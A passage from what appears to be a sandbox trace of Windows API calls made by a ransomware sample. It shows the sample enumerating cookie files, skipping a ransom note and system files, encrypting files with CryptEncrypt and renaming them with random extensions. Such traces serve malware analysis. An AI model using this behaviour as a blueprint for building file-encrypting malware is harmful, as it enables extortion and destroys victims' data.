HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN.Li5q") returned 124 [0181.637] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qikvsn"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN.Li5q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qikvsn.li5q"), dwFlags=0x0) returned 1 [0181.638] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.638] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.638] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.638] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4611db50, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4611db50, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab6cb200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x309, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", cAlternateFileName="5P5NRG~1.R1R")) returned 1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="DECRYPT-FILES.txt") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="autorun.inf") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="boot.ini") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="desktop.ini") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="ntuser.dat") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="iconcache.db") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="bootsect.bak") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="ntuser.dat.log") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="thumbs.db") returned -1 [0181.638] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5", lpString2="Bootfont.bin") returned -1 [0181.638] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5") returned 42 [0181.638] lstrcmpiW (lpString1="r1r5", lpString2="lnk") returned 1 [0181.638] lstrcmpiW (lpString1="r1r5", lpString2="exe") returned 1 [0181.639] lstrcmpiW (lpString1="r1r5", lpString2="sys") returned -1 [0181.639] lstrcmpiW (lpString1="r1r5", lpString2="dll") returned 1 [0181.639] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.639] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5") returned 42 [0181.639] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.639] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5" [0181.639] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.641] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=777) returned 1 [0181.641] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.641] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.642] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.642] CloseHandle (hObject=0x288) returned 1 [0181.642] CloseHandle (hObject=0x284) returned 1 [0181.642] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.643] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x534b4210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x562c6900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab7174c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", cAlternateFileName="5P5NRG~1.JZC")) returned 1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="DECRYPT-FILES.txt") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="autorun.inf") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="boot.ini") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="desktop.ini") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="ntuser.dat") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="iconcache.db") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="bootsect.bak") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="ntuser.dat.log") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="thumbs.db") returned -1 [0181.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp", lpString2="Bootfont.bin") returned -1 [0181.643] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp") returned 37 [0181.643] lstrcmpiW (lpString1="jzCp", lpString2="lnk") returned -1 [0181.643] lstrcmpiW (lpString1="jzCp", lpString2="exe") returned 1 [0181.643] lstrcmpiW (lpString1="jzCp", lpString2="sys") returned -1 [0181.643] lstrcmpiW (lpString1="jzCp", lpString2="dll") returned 1 [0181.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.643] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp") returned 37 [0181.643] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp" [0181.643] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzcp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.644] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=754) returned 1 [0181.644] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.644] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.645] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.645] CloseHandle (hObject=0x288) returned 1 [0181.645] CloseHandle (hObject=0x284) returned 1 [0181.645] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.645] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45798350, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45798350, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab73d620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", cAlternateFileName="5P5NRG~1.LFR")) returned 1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="DECRYPT-FILES.txt") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="autorun.inf") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="boot.ini") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="desktop.ini") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="ntuser.dat") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="iconcache.db") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="bootsect.bak") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="ntuser.dat.log") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="thumbs.db") returned -1 [0181.645] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU", lpString2="Bootfont.bin") returned -1 [0181.645] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU") returned 40 [0181.645] lstrcmpiW (lpString1="lFrkU", lpString2="lnk") returned -1 [0181.645] lstrcmpiW (lpString1="lFrkU", lpString2="exe") returned 1 [0181.645] lstrcmpiW (lpString1="lFrkU", lpString2="sys") returned -1 [0181.646] lstrcmpiW (lpString1="lFrkU", lpString2="dll") returned 1 [0181.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.646] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU") returned 40 [0181.646] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.646] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU" [0181.646] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lfrku"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.647] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=720) returned 1 [0181.647] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.647] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.648] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.648] CloseHandle (hObject=0x288) returned 1 [0181.648] CloseHandle (hObject=0x284) returned 1 [0181.648] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.648] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbdf95770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbdf95770, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xab7898e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", cAlternateFileName="5P5NRG~1.YSX")) returned 1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="DECRYPT-FILES.txt") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="autorun.inf") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="boot.ini") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="desktop.ini") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="ntuser.dat") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="iconcache.db") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="bootsect.bak") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="ntuser.dat.log") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="thumbs.db") returned -1 [0181.648] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1", lpString2="Bootfont.bin") returned -1 [0181.648] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1") returned 39 [0181.648] lstrcmpiW (lpString1="YSXU1", lpString2="lnk") returned 1 [0181.648] lstrcmpiW (lpString1="YSXU1", lpString2="exe") returned 1 [0181.648] lstrcmpiW (lpString1="YSXU1", lpString2="sys") returned 1 [0181.648] lstrcmpiW (lpString1="YSXU1", lpString2="dll") returned 1 [0181.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.649] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1") returned 39 [0181.649] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.649] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1" [0181.649] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.ysxu1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.649] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=394) returned 1 [0181.649] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.649] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.650] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.650] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.650] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.650] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.650] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.651] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.651] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.651] CloseHandle (hObject=0x288) returned 1 [0181.651] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.651] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.652] CloseHandle (hObject=0x0) returned 0 [0181.652] CloseHandle (hObject=0x284) returned 1 [0181.652] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.652] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.653] GetTickCount () returned 0x1134cd9 [0181.653] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.653] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.653] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.653] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.653] lstrlenA (lpString="kernel32.dll") returned 12 [0181.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.653] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.653] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.653] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.653] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.653] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.653] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.654] lstrlenA (lpString="ADDATOMA") returned 8 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.654] lstrlenA (lpString="ADDATOMW") returned 8 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.654] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.654] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.654] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.654] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.654] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.654] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.654] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.654] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.654] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.654] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.654] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.654] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.654] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.654] lstrcpyA (in: 